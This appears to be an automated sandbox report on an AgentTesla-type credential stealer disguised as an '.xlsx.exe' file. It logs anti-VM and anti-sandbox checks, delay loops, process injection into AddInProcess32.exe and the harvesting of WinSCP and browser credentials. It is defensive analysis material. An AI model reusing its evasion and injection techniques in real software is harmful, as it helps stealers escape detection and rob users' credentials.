Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: M_F+niestandardowy stempel.xlsx.exe PID: 6696, type: MEMORYSTR

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: M_F+niestandardowy stempel.xlsx.exe, 00000000.00000002.1814357877.000001FE23185000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: M_F+niestandardowy stempel.xlsx.exe, 00000000.00000002.1814357877.000001FE23185000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Memory allocated: 1FE230E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Memory allocated: 1FE3B140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2F30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2F70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 4F70000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 1266			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 3216			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7252	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7252	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7260	Thread sleep count: 1266 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7252	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7252	Thread sleep time: -99765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7252	Thread sleep time: -99656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7260	Thread sleep count: 3216 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7252	Thread sleep time: -99547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7252	Thread sleep time: -99437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7252	Thread sleep time: -99328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7252	Thread sleep time: -99219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7252	Thread sleep time: -99094s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7252	Thread sleep time: -98984s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7252	Thread sleep time: -98875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7252	Thread sleep time: -98765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7252	Thread sleep time: -98656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7252	Thread sleep time: -98547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7252	Thread sleep time: -98437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7252	Thread sleep time: -98328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7252	Thread sleep time: -98219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7252	Thread sleep time: -98094s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7252	Thread sleep time: -97984s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7252	Thread sleep time: -97875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7252	Thread sleep time: -97765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7252	Thread sleep time: -97656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7252	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 99765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 99547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 99437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 99328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 99219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 99094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 98984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 98875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 98765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 98656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 98547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 98437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 98328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 98219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 98094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 97984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 97875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 97765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 97656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: M_F+niestandardowy stempel.xlsx.exe, 00000000.00000002.1814357877.000001FE23185000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: M_F+niestandardowy stempel.xlsx.exe, 00000000.00000002.1814357877.000001FE23185000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: M_F+niestandardowy stempel.xlsx.exe, 00000000.00000002.1814357877.000001FE23185000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: M_F+niestandardowy stempel.xlsx.exe, 00000000.00000002.1814357877.000001FE23185000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: M_F+niestandardowy stempel.xlsx.exe, 00000000.00000002.1814357877.000001FE23185000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: AddInProcess32.exe, 00000002.00000002.2890557949.0000000006263000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: M_F+niestandardowy stempel.xlsx.exe, 00000000.00000002.1814357877.000001FE23185000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: M_F+niestandardowy stempel.xlsx.exe, 00000000.00000002.1814357877.000001FE23185000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: M_F+niestandardowy stempel.xlsx.exe	Binary or memory string: FUNCPUREVIRTUALMachine
Source: M_F+niestandardowy stempel.xlsx.exe, 00000000.00000002.1814357877.000001FE23185000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: M_F+niestandardowy stempel.xlsx.exe, 00000000.00000002.1814357877.000001FE23185000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: M_F+niestandardowy stempel.xlsx.exe, 00000000.00000002.1814357877.000001FE23185000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: M_F+niestandardowy stempel.xlsx.exe, 00000000.00000002.1814357877.000001FE23185000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: M_F+niestandardowy stempel.xlsx.exe, HasElementTypeMyVideos.cs	Reference to suspicious API methods: ((CaseSensitiveCanceled)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibrary(ThreadingKeywordopAddition(getSourceReleaseAllResources.getDefaultThreadCurrentUICultureGlobalCount)), ThreadingKeywordopAddition(getSourceReleaseAllResources.EmitCallIModulusOperators3)), typeof(CaseSensitiveCanceled)))("Pointer", out var _)
Source: M_F+niestandardowy stempel.xlsx.exe, HasElementTypeMyVideos.cs	Reference to suspicious API methods: ((CaseSensitiveCanceled)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibrary(ThreadingKeywordopAddition(getSourceReleaseAllResources.getDefaultThreadCurrentUICultureGlobalCount)), ThreadingKeywordopAddition(getSourceReleaseAllResources.EmitCallIModulusOperators3)), typeof(CaseSensitiveCanceled)))("Pointer", out var _)
Source: M_F+niestandardowy stempel.xlsx.exe, HasElementTypeMyVideos.cs	Reference to suspicious API methods: VirtualProtect(procAddress, (uint)array.Length, 64u, out var MultiplyAddAdjacentTranscodingStream)
Source: 0.2.M_F+niestandardowy stempel.xlsx.exe.1fe331bf788.2.raw.unpack, k4Pbu.cs	Reference to suspicious API methods: _4Vbl.OpenProcess(mxMeagYTS.DuplicateHandle, bInheritHandle: true, (uint)uq7wFEAU2.ProcessID)

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43C000	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43E000	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: ED3008	Jump to behavior

Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"			Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"			Jump to behavior

Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Queries volume information: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.M_F+niestandardowy stempel.xlsx.exe.1fe33184d40.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.M_F+niestandardowy stempel.xlsx.exe.1fe331bf788.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.M_F+niestandardowy stempel.xlsx.exe.1fe331bf788.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.M_F+niestandardowy stempel.xlsx.exe.1fe33184d40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2886508442.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2885370305.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2886508442.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2886508442.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1816336840.000001FE33147000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: M_F+niestandardowy stempel.xlsx.exe PID: 6696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 2060, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

